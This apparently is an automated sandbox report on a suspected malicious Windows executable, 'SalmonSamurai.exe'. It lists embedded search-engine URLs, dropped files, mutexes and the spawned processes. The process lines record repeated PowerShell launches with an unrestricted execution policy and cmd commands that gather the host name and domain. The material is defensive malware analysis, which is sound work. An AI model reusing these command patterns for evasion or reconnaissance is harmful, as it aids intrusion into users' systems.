Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.nic.cz/odvr/CZ.NIC
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.privacywall.org/images/favicon_32x32.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.privacywall.org/images/favicon_32x32.icohttps://www.privacywall.org/search/secure/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.privacywall.org/search/secure/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.quad9.net/home/privacy/
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.quad9.net/home/privacy/Quad9
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.qwant.com/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.qwant.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.qwant.com/favicon.icohttps://www.qwant.com/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.so.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.so.com/favicon.icohttps://www.so.com/s?ie=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.so.com/s?ie=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.sogou.com/images/logo/old/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.sogou.com/images/logo/old/favicon.icohttps://www.sogou.com/web?ie=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.sogou.com/web?ie=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.yandex.by/chrome/newtab
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.yandex.com.tr/
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.yandex.com.tr/chrome/newtab
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.yandex.kz/chrome/newtab
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.yandex.ua/chrome/newtab
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.zoznam.sk/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.by/
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.by/images/search/?rpt=imageview
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.by/images/search/?rpt=imageviewhttps://www.yandex.by/chrome/newtabhttps://storage.ape
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.com.tr/gorsel/search?rpt=imageview
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.com.tr/gorsel/search?rpt=imageviewhttps://www.yandex.com.tr/chrome/newtab
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.com/images/search?rpt=imageview
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.com/search/?text=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.kz/
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.kz/images/search/?rpt=imageview
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.kz/images/search/?rpt=imageviewhttps://www.yandex.kz/chrome/newtab
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.ua/
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.ua/images/search/?rpt=imageview
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.ua/images/search/?rpt=imageviewhttps://www.yandex.ua/chrome/newtab
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.icohttps://yandex.by/
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.icohttps://yandex.com/search/?text=
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: RegisterRawInputDevices() failed for RIDEV_REMOVEmemstr_b4d6eb1a-5

System Summary

barindex
Drops large PE files
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile dump: SalmonSamurai.exe.0.dr 160143360Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess Stats: CPU usage > 49%
Source: libEGL.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: libGLESv2.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: SalmonSamurai.exe.0.drStatic PE information: Number of sections : 15 > 10
Source: vk_swiftshader.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: vulkan-1.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: SalmonSamurai.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal45.winEXE@77/139@2/3
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtractedJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:984:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3408:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3132:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6676:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5212:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2368:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6656:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2256:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3284:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1808:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3864:120:WilError_03
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Local\Temp\nsq5816.tmpJump to behavior
Source: SalmonSamurai.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: SalmonSamurai.exeReversingLabs: Detection: 30%
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile read: C:\Users\user\Desktop\SalmonSamurai.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\SalmonSamurai.exe "C:\Users\user\Desktop\SalmonSamurai.exe"
Source: C:\Users\user\Desktop\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1836 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2072 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
